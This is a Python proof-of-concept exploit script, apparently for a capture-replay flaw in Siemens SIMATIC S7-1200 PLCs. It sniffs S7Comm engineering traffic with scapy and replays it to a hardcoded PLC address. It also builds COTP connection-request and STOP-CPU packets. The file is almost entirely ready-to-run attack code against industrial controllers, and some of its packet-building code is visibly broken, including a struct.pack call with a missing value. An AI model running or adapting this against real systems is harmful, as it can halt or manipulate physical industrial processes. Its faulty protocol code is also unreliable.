# CVE-2011-20002 - SIMATIC S7-1200 Capture-Replay Attack PoC
# This PoC demonstrates the capture-replay vulnerability in SIMATIC S7-1200 CPU
# Using scapy to craft and replay S7Comm packets
from scapy.all import *
from scapy.layers.inet import TCP, IP
import struct
import time
# S7Comm protocol constants
S7COMM_PORT = 102 # ISO-on-TCP / TPKT port
def build_tpkt_header(payload_len):
"""Build TPKT header for S7Comm packet"""
return struct.pack('>BBH', 3, 0, payload_len + 4)
def build_cotp_cr_packet():
"""Build COTP Connection Request packet"""
# COTP CR (Connection Request) TPDU
cotp_cr = b'\x11\xe0\x00\x00\x00\x01\x00\xc1\x02\x01\x00\xc2\x02\x01\x00\xc0\x01\x0a'
tpkt = build_tpkt_header(len(cotp_cr))
return tpkt + cotp_cr
def build_s7comm_setup_communication():
"""Build S7Comm Setup Communication packet"""
# S7Comm header: protocol id, ROSCTR=1 (Job), redundancy identification
s7_header = struct.pack('>HHH', 0x0032, 0x0001, 0x0000)
# Setup communication parameter
setup_param = struct.pack('>BBBBHHBB',
0xf0, # Function: Setup communication
0x00, # Reserved
0x00, 0x01, # Max AmQ calling
0x01, 0x00, # Max AmQ called
0x01e0, # PDU length
)
payload = s7_header + setup_param
tpkt = build_tpkt_header(len(payload))
return tpkt + payload
def build_s7comm_stop_cpu():
"""Build S7Comm STOP CPU command packet"""
# S7Comm header
s7_header = struct.pack('>HHH', 0x0032, 0x0001, 0x0000)
# Userdata parameter - STOP CPU command
# Function group: CPU functions (0x00)
# Subfunction: STOP (0x29)
userdata = struct.pack('>BBBBBB',
0x00, # Param count
0x00, # Param length high
0x05, # Param length low
0x00, # Data count
0x00, # Data length high
0x00, # Data length low
)
# STOP CPU command structure
stop_cmd = struct.pack('>BBBBBBBB',
0x11, # Function
0x00, # Subfunction
0x00, # Sequence number
0x00, 0x00, # Reserved
0x09, # Method: STOP
0x00, 0x00,
)
payload = s7_header + userdata + stop_cmd
tpkt = build_tpkt_header(len(payload))
return tpkt + payload
def capture_session(interface, target_ip, duration=30):
"""
Phase 1: Capture legitimate engineering session
Sniff packets between engineering software and PLC
"""
print(f"[*] Capturing S7Comm session on {interface} for {duration}s...")
print(f"[*] Target PLC: {target_ip}:{S7COMM_PORT}")
captured_packets = []
def packet_handler(pkt):
if pkt.haslayer(TCP) and pkt[TCP].dport == S7COMM_PORT:
captured_packets.append(bytes(pkt[TCP].payload))
print(f"[+] Captured {len(captured_packets)} S7Comm packet(s)")
sniff(iface=interface, prn=packet_handler, timeout=duration,
lfilter=lambda x: x.haslayer(TCP) and x[TCP].dport == S7COMM_PORT)
return captured_packets
def replay_attack(target_ip, captured_packets):
"""
Phase 2: Replay captured packets to the PLC
This exploits the lack of replay protection in S7-1200
"""
print(f"\n[*] Starting replay attack against {target_ip}...")
for i, pkt_data in enumerate(captured_packets):
try:
# Send raw TCP data to PLC
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
sock.connect((target_ip, S7COMM_PORT))
sock.send(pkt_data)
response = sock.recv(4096)
sock.close()
print(f"[+] Replayed packet {i+1}/{len(captured_packets)} - Response: {len(response)} bytes")
time.sleep(0.5)
except Exception as e:
print(f"[-] Error replaying packet {i+1}: {e}")
print("[+] Replay attack completed!")
def main():
"""Main exploit function for CVE-2011-20002"""
print("=" * 60)
print("CVE-2011-20002 - SIMATIC S7-1200 Capture-Replay Exploit")
print("=" * 60)
target_ip = "192.168.0.1" # Target PLC IP address
interface = "eth0" # Network interface for sniffing
# Step 1: Capture legitimate session
packets = capture_session(interface, target_ip, duration=60)
if packets:
# Step 2: Wait and replay
print("[*] Waiting 10 seconds before replay...")
time.sleep(10)
replay_attack(target_ip, packets)
else:
print("[-] No packets captured. Ensure you're on-path between engineering software and PLC.")
if __name__ == "__main__":
main()